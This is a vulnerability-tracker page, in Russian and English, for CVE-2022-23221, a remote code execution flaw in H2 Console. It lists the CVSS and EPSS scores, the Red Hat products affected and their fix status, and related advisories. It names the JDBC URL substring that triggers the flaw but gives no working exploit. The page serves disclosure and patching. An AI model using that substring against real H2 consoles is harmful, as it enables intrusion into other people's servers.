Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

redhat логотип

CVE-2022-23221

Опубликовано: 19 янв. 2022
Источник: redhat
CVSS3: 9.8
EPSS Средний

Описание

H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.

A flaw was found in the H2 Console. This flaw allows remote attackers to execute arbitrary code via a JDBC URL, concatenating with a substring that allows remote code execution by using a script.

Отчет

In OpenShift Container Platform (OCP) the openshift-enterprise-3.11/metrics-hawkular-metrics-container container image ships a vulnerable version of h2 as part of the underlying images, but as it uses standard configuration and Console is not enabled/started by default, therefore the impact by this vulnerability is LOW and will not be fixed as OCP 3.x has already reached End of Full Support. [1] https://access.redhat.com/support/policy/updates/openshift_noncurrent

Затронутые пакеты

ПлатформаПакетСостояниеРекомендацияРелиз
Red Hat BPM Suite 6h2Out of support scope
Red Hat build of Apicurio Registry 2h2Fix deferred
Red Hat Decision Manager 7h2Not affected
Red Hat Integration Camel K 1h2Not affected
Red Hat Integration Camel Quarkus 1h2Not affected
Red Hat JBoss BRMS 5h2Out of support scope
Red Hat JBoss BRMS 6h2Out of support scope
Red Hat JBoss Data Grid 7h2Out of support scope
Red Hat JBoss Data Virtualization 6h2Out of support scope
Red Hat JBoss Enterprise Application Platform 6h2Out of support scope

Показывать по

Ссылки на источники

Дополнительная информация

Статус:

Important
Дефект:
CWE-502
https://bugzilla.redhat.com/show_bug.cgi?id=2044596h2: Loading of custom classes from remote servers through JNDI

EPSS

Процентиль: 96%
0.26568
Средний

9.8 Critical

CVSS3

Связанные уязвимости

ubuntu логотип

CVE-2022-23221

CVSS3: 9.8
ubuntu
около 4 лет назад

H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.

nvd логотип

CVE-2022-23221

CVSS3: 9.8
nvd
около 4 лет назад

H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.

debian логотип

CVE-2022-23221

CVSS3: 9.8
debian
около 4 лет назад

H2 Console before 2.1.210 allows remote attackers to execute arbitrary ...

github логотип

GHSA-45hx-wfhj-473x

CVSS3: 9.8
github
около 4 лет назад

Arbitrary code execution in H2 Console

fstec логотип

BDU:2022-02030

CVSS3: 9.8
fstec
около 4 лет назад

Уязвимость системы управления базами данных H2 , связанная с неверным управлением генерацией кода, позволяющая нарушителю выполнить произвольный код

EPSS

Процентиль: 96%
0.26568
Средний

9.8 Critical

CVSS3